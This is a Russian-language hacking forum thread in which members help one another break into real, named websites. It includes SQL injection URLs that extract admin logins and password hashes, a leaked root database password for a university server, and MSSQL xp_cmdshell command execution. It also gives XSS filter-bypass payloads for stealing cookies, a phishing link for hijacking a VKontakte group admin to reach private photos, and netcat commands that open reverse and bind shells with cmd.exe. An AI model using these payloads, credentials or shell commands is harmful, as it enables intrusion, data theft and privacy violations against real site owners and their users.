Часто бывает, что в корне сайта валяется пхпинфо с именем типа phpinfo.php, info.php, test.php и т.д.

можно через гугль ошибки поискать...
site:jertva.com Warning
если гугл ошибок не помнит, то идем на
madnet.name/tools/madss/
вбиваем имя сайта и смотрим, хостятся ли рядом какие-либо сайты... если да, то поочерёдно вбиваем в гугль
site:sait_ryadom_s_jertvoi.com Warning

P.S
кроме Warning, можно и по другим кеям поискать, Error, "failed to open stream"...

http://asm-mebel.ru/index.php?page=catalog1&id=-1+union+select+column_name+from+information_schema .columns+where+table_name=0x61736d5f61646d696e+lim it+2,1--

почему сам учётки не высвечиваются?

http://asm-mebel.ru/index.php?page=catalog1&id=-1+union+select+column_name+from+information_schema .columns+where+table_name=0x61736d5f61646d696e+lim it+2,1--

почему сам учётки не высвечиваются?

Ну наверное чтобы узнать учётки надо вот такой запрос сделать
http://asm-mebel.ru/index.php?page=catalog1&id=-1+union+select+concat_ws(0x40,name,password)+from+ asm_admin+limit+0,1--
А то что ты выше написал-этим мы всего лишь узнаем какие колонки в таблице asm_admin

Отлично) спс огромное!

подскажите что ещё за хэш ?
5096c350535026dc

эти пароли хоаняться в файле htpasswd ....

Далеко не факт, просто вероятно пароль не хранится в бд... А находиться он может где угодно. Я встречал, даже когда авторизация с данными для входа была вшита в сам скрипт(запароленый), к которому мы обращаемся

Есть сайт bridge.tane.edu.ua, есть пароль на рута
$DATABASENAME = "stud_test";
$DATABASESERVER = "localhost";
$DATABASEUSER = "root";
$DATABASEPASS = "steppenW";
Есть майадмин: bridge.tane.edu.ua/phpmyadmin/
Сервер запущен на 192.168.101.18, и постоянно туда редиректит, если заходить через майадмин.
Как нормально поюзать багу?

Подскажите, каким образом можно просмотреть имена таблиц и колонок при SQL-инъекции другой базы данных, находящейся на этом же аккаунте?

Thrasher88
column_name+from+information_schema.columns+where+ table_schema='база'+and+table_name='табли ца'

Он не редиректит просто либо серв мускула на другом серваке,либо на этом же,тогда надо лить шелл.

Goudini
Да всё нормально юзается. Заходит в майадмин с этими данными норм, как root@sectorgaza =)
Что конкретно тебе нужно?

Всем доброго времени суток!
Я тут недавно начал изучать SQL inj . читал статьи и.т.д

1)Нашел уязвимость подставив кавычку
(выдалась ошибка )
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''100''' at line 6

2)Начал искать кол-во полей подобрал вручную около 50 (потом устал :) ),
но на 20 аргументе у меня выдалось не то что всегдда выдавалось
(от 1 до 19 и от 21 до 50),я решил что строк 20....

3)Решил подставить VERSION() USER()..итд
получил ответы:
DB: tmhoxc76
Usr: tmhoxc76@*ipsite*
Ver: 4.1.22-max-log

вобщем вопросик:
даж не знаю как сказать....
вобщем все запросы котрые я делал отображались
не в теле сайта,а шли вместо замены ссылки,но выводились правильно как я понял....
так вот как мне тееперь извлечь данные из таблицы? :confused: :confused: :confused:

ПыСы: ссорь hack.lang=2

Astrit нужно знать имена таблиц и название столбцов к этим таблицам, и выводить.
Вместо VERSION() USER() ты подставляешь название столбца, а в конце указываешь команду из какой таблицы следует выводить ;)

Подскажите пожайлуста,я нашел активную хсс на сайте,только немогу сложить код для него,уязвимость находится в строчке
<span style="color:#FFFFFF">...</span>
после FFFFFF могу вставить любой текст,но идется фильтрацыя знаков ",',<,>.Остальные вроде не фильтруются,помогите сложить код,плиз...и даже в старом ачате есть в faq подобный пример
<span style=top:expression(alert('ok'))></span>
вот только тут есть ' и сам етот пример даже с ними не работает....

Подскажите пожайлуста,я нашел активную хсс на сайте,только немогу сложить код для него,уязвимость находится в строчке
<span style="color:#FFFFFF">...</span>
после FFFFFF могу вставить любой текст,но идется фильтрацыя знаков ",',<,>.Остальные вроде не фильтруются,помогите сложить код,плиз...и даже в старом ачате есть в faq подобный пример
<span style=top:expression(alert('ok'))></span>
вот только тут есть ' и сам етот пример даже с ними не работает....

Подскажу: если фильтруется то, что ты написал, то дальше развития "уязвимости" я не вижу.

Подскажу: если фильтруется то, что ты написал, то дальше развития "уязвимости" я не вижу.

Ну нескажи,слаживают и без етих знаков запросы...я уже туда вставлял даже картинку от сниффера,только вот же сами куки нешли,есле бы место картинки ссылку на яваскрипт запихнуть и чтобы он запустился то вс отлично бы пошло,ну такой ф-цыи я например незнаю...и видел дето о xss через utf7 там вопше какраз ети же знаки заменяются....думаю можно выход найти.....

попробуй
javascript:eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41, 59))

попробуй

дык ето ты вопше яваскрипт написал,а нужно придумать как его же втилющить в тег span style чтобы он работал то....ты нарна вопше не понял суть проблемы....

дык ето ты вопше яваскрипт написал,а нужно придумать как его же втилющить в тег span style чтобы он работал то....ты нарна вопше не понял суть проблемы....
далпаёп)))))

вот:
, background:url(javascript:тут_мой_скрип т)

old.antichat.ru/txt/IPB/index3.php

далпаёп)))))
ставь запятую после FFFFFF, пробел и этот ява скрипт, по идее должен работать)

1.непашет!!!!!!!!
2."далпаёп" тут развешто только ты....

вот:
, background:url(javascript:тут_мой_скрип т)

old.antichat.ru/txt/IPB/index3.php

Тут россмотрена проблема с фильтрацыей ; только,а у меня наоборот,она норм работает,и вопше,тут расмотрен совсем другой случай, с [COLOR] который потом переделуется,а не напрямую со стилем...

вот:

я уже пробывал так,етот метод везде россматрюют,но он неработает почемуто даже напрямую,даже из робочий пример сам беру и он не пашет почемуто!(((

Подскажите пожалуйста как можно добавить себя в закрытую группу на сайте vkontakte.ru, без одобрения администратора группы, может быть есть какая то уязвимость на этот случай? Большое спасибо всем кто откликнется!!
Меня там интересует в первую очередь фотоальбом

Подскажите пожалуйста как можно добавить себя в закрытую группу на сайте vkontakte.ru, без одобрения администратора группы, может быть есть какая то уязвимость на этот случай? Большое спасибо всем кто откликнется!!
Меня там интересует в первую очередь фотоальбом
Взломать админа группы и добавить себя самостоятельно!

Взломать админа группы и добавить себя самостоятельно!
Как же можно это сделать? вообще мне бы подошел любой из участников этой группы
Смысл в том что мне нужна их скрытая инфа, в первую очередь фотки, ну и желательно все остальное :)

при запросе /index.php?list=range' выдает ошибку
query = No where in query: SELECT * FROM
куда вставить where?)

при запросе /index.php?list=range' выдает ошибку
query = No where in query: SELECT * FROM
куда вставить where?)
никуда её ненадо ставить..дай линк..раскручу(если скуля,но я думаю 99% скуль)

2masternet хых)) в пм)

Есть сайт с MSSQL inj.
Скрипт фильтрует симолы (",.)(][=; ..... итд).
То есть отсылает их виде ascii символов.
Вот пример для наглядности:
index.asp?news=-1'
Invalid column name '#39'. (где #39 - ascii код одинарной кавычки).

Можно ли это ппобороть? Необходимо получить возможность комментирования и прерывания запроса (это ; и --. Причем -- переводит в ascii, только если два знака дефиса).

Через union select данные выводятся без каких-либо проблем. Но мне нужно исполнение комманд в этом случае. ;)

Подскажите пожалуйста как можно добавить себя в закрытую группу на сайте vkontakte.ru, без одобрения администратора группы, может быть есть какая то уязвимость на этот случай? Большое спасибо всем кто откликнется!!
Меня там интересует в первую очередь фотоальбом

это не тот пост который тебе нужен! Вот зайди сюда http://forum.antichat.ru/thread94702.html или сюда http://forum.antichat.ru/thread45578.html

А вобще:
Узнаешь имя админа группы далее скидываешь ему ссылку http://www.vkavkaz.tu2.ru/ ну типа поддержи наш сайт и т.д. Могешь сам придумать что нить в этом плане ну или типа (дипломная работа подержи зарегся) Далее идешь сам по ссылку http://www.vkavkaz.tu2.ru/index1.php и смотришь мыло с пасом последнее вот и вс удачи!

Люди вот вам сайт hollyro.zapto.org ! Доступ к базе hollyro.zapto.org/phpmyadmin ! Прошу если вы раскрутите,пожалуйста напишите как вы это сделали! Только не трогайте базу!!!
P.S. Спасибо!!! Это мой сайт дал просто на раскрутку! Интересно как моно ракрутить! Вот как читать файлы hollyro.zapto.org/phpmyadmin/phpmyadmin.css.php ! Я вам в рот положил терь жуйте!

Я вам в рот положил
..))

Народ, подскажите пожалуйста как правильно оформить функцию MS SQL для вывода результата(можно и процедуру).
Пример:
------------------
create function mfunc() returns varchar
as begin
declare @sql varchar(8000)
set @sql=0x73656c65637420404076657273696f6e <---Это запрос "select @@version" зашифрованный в HEX
exec @sql
return @sql
END
------------------

Чето я и доков то нормальных не на гуглил...
Надо чтоб вывело :
------------------
Microsoft SQL Server 2005 - 9.00.3042.00 (X64) Feb 10 2007 00:59:02 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
------------------
В таком роде...

В МС СКЛ Хекс не действует.Почитай статьи про инъекты м МС СКЛ.

Если не работает хекс, то почему тогда срабатывает запрос вида :
declare @net_grouprdp_add varchar(8000) select @net_grouprdp_add=0x6e6574206c........;exec master..xp_cmdshell @net_grouprdp_add;

----
С функцией я разобрался. Создал процедуру.

Подскажите пожайлуста,я нашел активную хсс на сайте,только немогу сложить код для него,уязвимость находится в строчке
<span style="color:#FFFFFF">...</span>
после FFFFFF могу вставить любой текст,но идется фильтрацыя знаков ",',<,>.Остальные вроде не фильтруются,помогите сложить код,плиз...и даже в старом ачате есть в faq подобный пример
<span style=top:expression(alert('ok'))></span>
вот только тут есть ' и сам етот пример даже с ними не работает....

Так ответ я и не услышал...

через eval() попробуй.....
и вместо символов- ascii коды
http://pro.grammatic.org/post-javascript-eval-stringfromcharcode-encoder-11.aspx

Проблема:
-1'CREATE PROC test AS SELECT 1;--sp_password

'CREATE PROCEDURE' must be the first statement in a query batch.

Че за фишка? Не въеду...

через eval() попробуй.....
и вместо символов- ascii коды
http://pro.grammatic.org/post-javascript-eval-stringfromcharcode-encoder-11.aspx

Оно то всё хорошо,но в теге style комманда javascript: ВООООООООООПШЕЕЕЕЕЕ непашет!!((((((((((( :( :( :( :( :(

кажись уже давали эту ссылку:
http://www.inattack.ru/article/519.html
там насчет style 2 вектора есть, попробуй)

Проблема:
-1'CREATE PROC test AS SELECT 1;--sp_password

'CREATE PROCEDURE' must be the first statement in a query batch.

Че за фишка? Не въеду...
попробуй так:
1';CREATE PROC test AS SELECT 1;--sp_password

@Mixon
attr:expression() работает только в IE
background-image: url(javascript:alert()) должно везде работать
http://ha.ckers.org/xss.html

Там опечатка была )) Ну а в целом я так и сделал. И опять такую же ошибку выдает... :(

Еще одная интересная фишка:
Если выполнить -1+or+1=(select+user)-- то норм проходит.
А если попробовать :
-1+or+1=(SELECT+top+1+table_name+from+information_s chema.tables)--
Выдает:
Incorrect syntax near the keyword 'top'.

Если так:
-1+or+1=(SELECT+table_name+from+information_schema. tables)--
Incorrect syntax near the keyword 'FROM'.

Странно.

З. Ы. Microsoft SQL Server 2000

это не тот пост который тебе нужен! Вот зайди сюда http://forum.antichat.ru/thread94702.html или сюда http://forum.antichat.ru/thread45578.html

А вобще:
Узнаешь имя админа группы далее скидываешь ему ссылку http://www.vkavkaz.tu2.ru/ ну типа поддержи наш сайт и т.д. Могешь сам придумать что нить в этом плане ну или типа (дипломная работа подержи зарегся) Далее идешь сам по ссылку http://www.vkavkaz.tu2.ru/index1.php и смотришь мыло с пасом последнее вот и вс удачи!
Спасибо тебе огромное!!! А как интересно этот сайт работает?

http://www.u-mama.ru/forum/messages.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24

помогите немогу подобрать значение!

Обращаюсь к код-хакам:

function del_news($news_id)
{
if ($news_id)
{
//echo("del_news<br>");
$r = mysql_query("SELECT news_icon FROM news WHERE news_id=".$news_id);
$arr = mysql_fetch_array($r);

if ($arr[0]){ del_img($news_id);}
//echo("del_news_id=".$news_id."<br>");
mysql_query("DELETE FROM news WHERE news_id=".$news_id);
}
else echo("Функция del_news(news_id) - не указан news_id.<br>");
}

function del_img($news_id)
{
if ($news_id)
{
//echo("del_img<br>");
$r = mysql_query("SELECT news_icon FROM news WHERE news_id=".$news_id);
$arr = mysql_fetch_array($r);
mysql_query("UPDATE news SET news_icon=NULL WHERE news_id=".$news_id);
unlink("../".img_path.$arr[0]);
}
else echo("Функция del_img(news_id) - не указан news_id.<br>");
}

Если поставить DEL запрос - он прокатит ? Если допустить,что $news_id принимает всё,что угодно. Есть в прайс листе такая кнопка Удалить:)),и вместо удаления новости я хочу удалить таблицу)).Покатит ? Как это будет выглядеть,я тоже не совсем понимаю =_=

помогите немогу подобрать значение!

Тут нет инъекции..

Тут нет инъекции..
а что это по твоему?

Просто раскрытие путей.

Советую почитать FAQ (http://forum.antichat.ru/thread19844.html) , там написанно, как инъекцию определить..

http://kapstroytelecom.ru/?pid=17'

Это же mssql? Скорее всего через sa настроено, помогите с инъекцией для выполнения cmd через exec master..xp_cmdshell('')...

u36a
http://kapstroytelecom.ru/?pid=1+or+1=(select+system_user)
user: televik

Подскажите как победить это:
1' union select 1,version(),3
Inconvertible type mismatch between SourceColumn 'LeadDate' of Byte[] and the DataColumn 'LeadDate' of DateTime.
Сконвертить надо? Каким образом?
К примеру дулал так - 1' union select 1,cast(version()+as+datetime),3
В этом случае запрос проходит нормально, только вот результат не выводится...

ну так не в datetime а в byte, попробуй не числовые данные конвертировать например из table_name ;)

1' union select 1,unhex(hex(version())),3

Не помогло :eek:

ссылку кинь в PM

эта инъекция в куках.

http://social.msdn.microsoft.com/forums/en-US/winformsdatacontrols/thread/bf35e9f0-3b0f-428d-8cbc-9256e7351ca4/


Yes ,it not list System.Byte[] . But you can add "[ ]"after "System.Byte" manually, it goes well here. Hope it helps.

какой hex, какие [] вводимые данные должны быть в формате типа данных колонки)

/add скинь сцылко в пм

Хм получается что не будет вывода?

']попробуй так:
1';CREATE PROC test AS SELECT 1;--sp_password

@Mixon
attr:expression() работает только в IE
background-image: url(javascript:alert()) должно везде работать
http://ha.ckers.org/xss.html

Блииин,ну вот сделай html докуменд с содержанием <span style="color:#00FF00;background-image:url(javascript:alert());">ttt</span> и открой,ничего же не пашет!!!

кажись уже давали эту ссылку:
http://www.inattack.ru/article/519.html
там насчет style 2 вектора есть, попробуй)

Как я и думал,точнейшие примеры из етого сайта по етому,вот

2. <DIV>. Данный тег служит контейнером для внутреннего текста. К тексту, который находится внутри тегов <div></div>, может быть применён определённый стиль (CSS). Вот пример использования данного тега для XSS атаки:
<DIV STYLE="background-image: url(javascript:alert('Я здесь был'))">

Как видите, здесь мы используем вставку кода в параметр STYLE. Но есть и ещё один вариант использования данного тега. Не с помощью функции url(), а через функцию expression():
<DIV STYLE="width: expression(alert('Я здесь был '));">
В данном случае тоже используется параметр STYLE.

3. <STYLE>. Данный тег задает правила оформления и форматирования элементов, находящихся внутри тегов <STYLE></STYLE>. Вот 2 варианта использования XSS:
<STYLE>.XSS{background-image:url("javascript:alert('Я здесь был ')");}</STYLE><A CLASS=XSS></A>

Здесь происходит следующее действие – сначала объявляется класс XSS(в нём расположен XSS- код), а затем он вызывается с помощью
<A CLASS=XSS></A>

Второй вариант:
<STYLE> type="text/css">BODY{background:url("javascript:alert(‘Я здесь был’)")} </STYLE>
В этом варианте наш XSS-код указывается как фоновое изображение странички.



И НЕОДИН ИЗ НИХ НЕ ПАШЕТ!(((

Действительно, background:url(javascript:alert()) не работает. Тогда остается -moz-binding, который работает только в FF 2 и IE7, вот здесь даны примеры:
http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/

1' union select 1,unhex(hex(version())),3
ты хоть думаешь, что пишешь? это MSSQL

ты хоть думаешь, что пишешь? это MSSQL


Это я уже понял. Вместо того, чтобы кричать, лучше бы решение дали. Иначе ваш пост несет смысловой нагрузки 0%

Кстати, вовсе не факт, что обязательно MSSQL

На сервере MySQL + ASP.NET

интересное сочетание...
@Pashkela
откуда ты знал? =)

Ну что там Mysql и для меня удивление:) Просто такие же ошибки встречаются и в Access и в Oracle, судя по гуглу

Просто такие же ошибки встречаются и в Access и в Oracle
да все верно, я пришел к выводу, что это ошибка характерна для ASP.NET, а не для конкретной RDBS

Ну что там Mysql и для меня удивление:) Просто такие же ошибки встречаются и в Access и в Oracle, судя по гуглу

1)Ошибки не в бд, а в кодде веб приложения
2)Инжекту подвержены практически все виды бд ;)
поэтому удивляться тут нечему ;)

Чего-то мне последнее время кривые инъекции попадаются )))

-1+union+select+1--
Incorrect syntax near '1'.

-1+union+select+null--
Incorrect syntax near the keyword 'null'.

Чего оно хочет? O_o

Order by .. к примеру работает.

И еще -1+or+1=(select+user)-- выводит все верно, а вот если к примеру -1+or+1=(select+xxx+from+xxx)--
Incorrect syntax near the keyword 'from'.
------
Подкиньте пару вариантов как это одолеть ))

З. Ы. Microsoft SQL Server 2000

И еще -1+or+1=(select+user)-- выводит все верно, а вот если к примеру -1+or+1=(select+xxx+from+xxx)--
Incorrect syntax near the keyword 'from'.

попробуй так:
(select/**/top/**/1/**/xxx/**/from/**/xxx)--
(select%20top%201%20xxx%20from%20xxx)--

p.s: вообще линк скинь... ;)

Пробовал оба варианта, но ответ на них увы один:
Incorrect syntax near the keyword 'top'.

Попробуй просто обычные пробелы, без плюсов и слешей

Пробовал оба варианта, но ответ на них увы один:
Incorrect syntax near the keyword 'top'.

'top' иногда фильтруется попробуй заменить на max(table_name)

-1+or+1=(select+max(table_name)+from+qwqw)--sp_password
An aggregate may not appear in the WHERE clause unless it is in a subquery contained in a HAVING clause or a select list, and the column being aggregated is an outer reference.
Как его именно юзать? Можно примерчик?
С top разобраться я как понял можно
Но еще кое-что :(
Incorrect syntax near the keyword 'from'.

SHS
micr. ole?
-1+or+1=(select+top+1+table_name+from+information_s chema.columns+where+column_name+like+('sp_password '))--

Ладно хрен с ним с этим ресурсом. Отложу на время. Видимо там скрипт замысловатый. Угадать какие параметры и где вмазать пока увы не могу. Но по простой схеме инъекций там никак.

в общем друзья такой вопрос по SQL:

мне нужно задать свойство unique первичному ключу в таблице.. инными словами при создании таблицы с помощью оператора create задать первичному ключу свойство unique. как теперь его добавить? )

вопрос такой) sql inj я могу выводить данные из базы) могу править данные которые могу потом вывести) если добавить в таблицу запись <?php phpinfo(); ?> а потом вывести ее на страничку то он не выполняется(( а должен?)

j0ker13

то он не выполняется(( а должен?)

он и не выполнится, скрипт из базы никогда не выполнится... ;)

sabe
where+column_name+like+('sp_password '))--
ухах)))
сам понял че написал? ;)
п.6 (http://forum.antichat.ru/threadnav30501-4-10.html)

sabe

where+column_name+like+('sp_password '))--

ухах)))
сам понял че написал?


)))))))))))))))))))))) крутой чел)

в общем друзья такой вопрос по SQL:

мне нужно задать свойство unique первичному ключу в таблице.. инными словами при создании таблицы с помощью оператора create задать первичному ключу свойство unique. как теперь его добавить? )
если MySQL:

ALTER TABLE `tablename` ADD UNIQUE (`columnname`)

Как можно угнать историю сообщений от майл.ру агента, может какой скрипт на этот случай имеется?

Приветствую!)
Вот нашел форум http://forum.blacksun.com.ua/
...чего уже только не пробовал, никак не поддается(((
Фильтрация о4 хорошая, посоветуйте чтото...

вопрос)) id из таблицы выводится но username ругается на ошибку) колонка username точно есть потому что версия 5) из других таблиц текст выводится нормально. че не так?)

как сделать чтоб выводился ответ в виде циферок?) hex(username) тож не катит((

unhex(hex(username)) попробуй, а вообще текст ошибки надо прилагать, тут телепатов нет

j0ker13
Вариант 1
Она в другой базе
Вариант 2
Она пустая

И ещё куча вариантов, давай линк иначе это гадание

2Pashkela пробовал) ошибка думаю тебе тож ничего нескажет как и мне))Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource

2jokester потом линк спалю) база правильно указана потому что колонка id выводится) count(id) показывает 1

база правильно указана потому что колонка id выводится) count(id) показывает 1
И что? Колонка id тут причём? Допустим там две базы. та с которой работает скрипт назовём её base1, и base2 в которой твоя колонка username. Обе имеют таблицу user.

base1.user имеет поля id, mail, name
base2.user username password

Когда ты делаешь запрос
id+from+user тебе выводится id из base1.user

неужели трудно посмотреть запросом, где колонка? И при чём тут count(id)?

я писал что версия 5) извини если ты не догнал что я мог посмотреть в какой базе эта таблица (таблица admin). назовем эту базу admin. при запросе select id from admin.admin выводится 1. при запросе select username from admin.admin выводится ошибка. ессли не ошибаюсь count(id) показывает сколько записей. и одна запись там есть

2S00pY unhex(hex()) чем то разве отличается?)) вроде нет...

Попробуй заюзать
AES_DECRYPT/AES_ENCRYPT
хотя хз))

я писал что версия 5) извини если ты не догнал что я мог посмотреть в какой базе эта таблица (таблица admin). назовем эту базу admin. при запросе select id from admin.admin выводится 1. при запросе select username from admin.admin выводится ошибка. ессли не ошибаюсь count(id) показывает сколько записей. и одна запись там есть
Я не знаю как ещё объяснить, вроде всё подробно описал. Будет линк будет ясность, у меня такое ощущение, что ты не понимаешь о чём я говорю

Посмотри где КОЛОНКА username, это можно сделать так:
concat_ws(0x3a,table_schema,table_name)+from+infor mation_schema.columns+where+column_name='username'
Она может быть не в той БАЗЕ с которой работает скрипт. Базу можно посмотреть так:
Database()

Если у тебя table_schema=Database(), если нет, то БАЗА другая, несмотря на то, что ТАБЛИЦА называется так-же

2jokester слушай или ты недопонял или я о чем то умолчал... вывел всю базу с помощью concat_ws(0x3a,table_name,column_name) получил записи
admin:id
admin:username
admin:password
admin:last_login
с помощью конструкции table_schema from information_schema.tables where table_name=admin узнал что база ADMIN_PM. database() оказался равен ADMIN_PM... теперь понятнее?)) думаю ты не понял о чем я говорю)

Проблема: VPN сервер не видит моей локальной сети (192.168.1.0 255.255.255.0). У сервера маска 76.xx.xx.xx 255.255.255.248. Можно пример роутинга для корректной работы?

Да уж , я понимал. что будет сложно, но что-бы так сложно :). Объясняю последний раз, самый самый последний )вывел всю базу с помощью concat_ws(0x3a,table_name,column_name) получил Откуда ты её вывел? Какую базу? Из шемы. так? Так вот шема хранит в себе информацию обо ВСЕХ базах, колонках и столбцах и ей похрену где что находится пока ты не начнёшь сортировать всё это добро, так как тебе надо

Я уверен, что ты выводил инфу вот так :
concat_ws(0x3a,table_name,column_name)+from+inform ation_schema.columns и получил те записи, которые привёл выше. ОК .

Дальше я полагаю ты составил запрос:
id+from+admin и получил результат
Следующий запрос даёт ошибку
username+from+admin

Это ВОЗМОЖНО происходит потому, что КОЛОНКА username Находится в другой базе. Я видимо на китайском писал выше, и ты не понял, я веду речь о КОЛОНКЕ username

Что делаешь ты?
с помощью конструкции table_schema from information_schema.tables where table_name=admin узнал что база ADMIN_PMЭтот запрос выводит все базы, в которых присутствует таблица admin, а нифига не то что ты написал.(И уж тем более этот запрос не имеет никакого отношения к нашей КОЛОНКЕ username). Этих баз может быть БОЛЬШЕ чем одна.

Допустим, что их две. Тоесть твоя ADMIN_PM и test

Допустим, что ADMIN_PM НЕ ИМЕЕТ колонки username, а вот test как раз имеет. Что мы получим при твоём подходе:
записи
admin:id
admin:username
admin:password
admin:last_login
Будут выводится, т.к. шеме не задали условий для фильтрации и она по запросу
concat_ws(0x3a,table_name,column_name)+from+inform ation_schema.columnsвыводит все таблицы и поля из всех баз. Более того, даже если ей задать условие:
concat_ws(0x3a,table_name,column_name)+from+inform ation_schema.columns+where+table_name='admin'То опять-же по результату нельзя сказать, откуда это добро вывелось

А что-бы быть уверенным на 100% откуда КОЛОНКА запрос должен выглядеть так:
concat_ws(0x3a,table_schema,table_name,column_name )+from+information_schema.columns+where+column_nam e='username'
Обрати внимание, ГДЕ КОЛОНКА=username, а не так как у тебя :
where table_name=admin <-- ГДЕ ТАБЛИЦА=admin.

Потому, что при твоём запросе , и наличии ДВУХ разных баз, имеющих таблицу admin у тебя выведится первая запись, которая может совпасть с database().

Я не утверждаю, что дела обстоят именно так как я написал, линка нет, но это вполне возможно

PS Надеюсь понятно, что я имел ввиду, хотя теперь уже не важно :)

PPS Извиняюсь за "Многа букв", я пробовал поменьше, не вышло :)

Подскажите нормальный connect back под винду!
Написать его как в туалет сходить, но увы я юзаю только python.

Уфф....плюсану Джокестеру.Это мануал)))))))))))

2Джокестер хых) честно ничего нового не узнал...без обид)) вот теперь вижу что я не договорил и умолчал) чтож ссори бывает) при запросе
SELECT table_schema FROM information_schema.tables WHERE table_name = 'admin'
вывелся один результат) т.е. значит одна база с таблой админ) теперь понял почему я был так уверен что колонка admin.username именно в ЭТОЙ базе) теперь вопрос имеет ответ?)

Товарищи, помогите пожалуйста :)

1.Нашел скулю, попробывал mysql.user.password - выдало хеш пароля, а как узнать имя пользователя???
mysql.user.user???
Выдало common, верно ли?
Как я понял если я получу логин и пароль, то смогу зайти в пхпмайадмин и сдампить?
2.Как(Чем) можно сдампить БД MySQL 5.*?
3.Сюда же, чем перевести из букв в символы? 0x*****

1. union+select+user+from+mysql.user

Зайти сможешь, если есть удаленный доступ и расшифруешь хеш

2. Сдампить можно например SIPT4 или аналогичным софтом, например этим (http://pashkela.narod.ru/progi/MySQL5tool.rar)

3. Например такой програмкой (http://pashkela.narod.ru/progi/Text2HEX.rar)

@SHS
netcat

Спасибо за ответы, SIPT не выдергивает, вот такая ошибка вылазит:
Fields iRecordID:sIP:dtAdded
Error Getting Data

']@SHS
netcat
а как ему задать коммандную оболочку?

Спасибо за ответы, SIPT не выдергивает, вот такая ошибка вылазит:
Fields iRecordID:sIP:dtAdded
Error Getting Data


там есть и другой софт

Товарищи, помогите пожалуйста :)

1.Нашел скулю, попробывал mysql.user.password - выдало хеш пароля, а как узнать имя пользователя???
mysql.user.user???
Выдало common, верно ли?
Как я понял если я получу логин и пароль, то смогу зайти в пхпмайадмин и сдампить?
2.Как(Чем) можно сдампить БД MySQL 5.*?
3.Сюда же, чем перевести из букв в символы? 0x*****
1.Юзай concat_ws(0x3a,user,password)
2.Пхп скрипт моно написать не очень сложный (вообще софтадля этого хватает)
3.Любым hex кодировщиком

а как ему задать коммандную оболочку?
Если ты хочешь прослушивать определенный порт(ловить неткатом входящие соединения), то запускай так:

nc.exe -lvvp 888

где 888- порт, к которому должен идти коннект

Как порт слушать я то знаю, только при коннекте команды не исполняются, а просто выводятся на экран (то что напишешь)

что можно сделать с xss?
phpmyadmin/calendar.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>

Если я не ошибаюсь, то:простейший дефейс,и если оптемизировать, можно украсть куки...

Здравствуйте.
У меня к вам вот какой вопрос, есть сайт movieweb.com (http://movieweb.com) очень хочется его слить, но честное слово незнаю как это делается :(
Проверил на XSS в графе поиск фильма проходит "><script>alert(555)</script>, а что дальше делать незнаю :(
На форуме nulled.ws народ как-то делает рипы. Помогите сделать рип этого сайта или подскажите. что делать.
Заранее Вас благодарю.

Здравствуйте.
У меня к вам вот какой вопрос, есть сайт movieweb.com (http://movieweb.com) очень хочется его слить, но честное слово незнаю как это делается :(
Проверил на XSS в графе поиск фильма проходит "><script>alert(555)</script>, а что дальше делать незнаю :(
На форуме nulled.ws народ как-то делает рипы. Помогите сделать рип этого сайта или подскажите. что делать.
Заранее Вас благодарю.

Если XSS пассивная, то я сомневаюсь, что тебе удастся что-то сделать... Шансов мало. Нужно что-то более действенное

Если XSS пассивная, то я сомневаюсь, что тебе удастся что-то сделать... Шансов мало. Нужно что-то более действенное

Если честно незнаю какая :(

Здравствуйте.
У меня к вам вот какой вопрос, есть сайт movieweb.com (http://movieweb.com) очень хочется его слить, но честное слово незнаю как это делается :(
Проверил на XSS в графе поиск фильма проходит "><script>alert(555)</script>, а что дальше делать незнаю :(
На форуме nulled.ws народ как-то делает рипы. Помогите сделать рип этого сайта или подскажите. что делать.
Заранее Вас благодарю.Здравствуйте, по манере выражаться, Вы производите впечатление интелигентного человека, а вот по смыслу вопроса, о Вас такого не скажешь :D

С помощью пассивной XSS врятли Вам удастся сделать рип сайта , что-же касается Вашего вопроса по поводу "подскажите", думаю Вам для начала стоит поискать информацию по теме XSS, и ознакомится с ней, это тема не предназначена для ответов на такие обширные вопросы , рекоммендую прочесть и понять то , что написано сдесь:

http://old.antichat.ru/crackchat/index.html
https://forum.antichat.ru/thread20140.html

Здравствуйте, по манере выражаться, Вы производите впечатление интелигентного человека, а вот по смыслу вопроса, о Вас такого не скажешь :D

С помощью пассивной XSS врятли Вам удастся сделать рип сайта , что-же касается Вашего вопроса по поводу "подскажите", думаю Вам для начала стоит поискать информацию по теме XSS, и ознакомится с ней, это тема не предназначена для ответов на такие обширные вопросы , рекоммендую прочесть и понять то , что написано сдесь:

http://old.antichat.ru/crackchat/index.html
https://forum.antichat.ru/thread20140.html

Спасибо, что ответили, а также за просвеление примерно понял, что такое XSS. Что касаемо вопроса, то уже достаточно давно ищю скрипт что-то между кинопоиска и стандартного видеокаталога. А этот сайт как раз то что нужно. Такого скрипта наврядли где найдешь. Вот и мучает вопрос как с сие чудо мысли сделать рип. На другом форуме рипы делают но скрывают за такими сообщениями, которые я буду набирать года два не меньше это если с флудом, что не очень правильно. Поэтому пришел к мысли либо кого-то попросить рипануть либо как-нить самому это сделать, потому как аналогов я еще пока не видел.
Заранее прошу прощения за данное сообщение, так как оно может расцениватся как флуд.

подставляю ковычку
он мне выдает

Microsoft VBScript runtime error '800a000d'

Type mismatch: 'cint'

/instructorDesc.asp, line 45

возможна ли скуль?

У MJDE должна быть немного другая ошибка. Полагаю, что тут инъекции нету.

Как порт слушать я то знаю, только при коннекте команды не исполняются, а просто выводятся на экран (то что напишешь)

nc -l -p ПОРТ -d -e cmd.exe -BIND
nc host порт -d -e cmd.exe -Back-Connect

Спасиб ;)

Товарищи выручите плз еще раз :)
Такая ситуация, нашел иньекцию на сайте(версия мускула > 5 ), Нашел колонку которая интересна, теперь при запросе:
xxx.com/index.php?id=-1+union+select+1,2,3+from+user/*
Мне выдает:
Table 'sitename.user' doesn't exist

В чем ошибка? O_O

P.S. ссылку не дам :)